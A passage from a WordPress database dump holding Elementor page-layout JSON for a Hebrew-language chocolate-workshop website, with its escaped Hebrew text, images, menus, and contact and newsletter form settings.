\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(515,119,'_elementor_version','0.4'),(516,119,'_elementor_template_type','post'),(520,120,'_wp_page_template','elementor_canvas'),(521,120,'_elementor_edit_mode','builder'),(522,120,'_elementor_template_type','post'),(523,120,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center 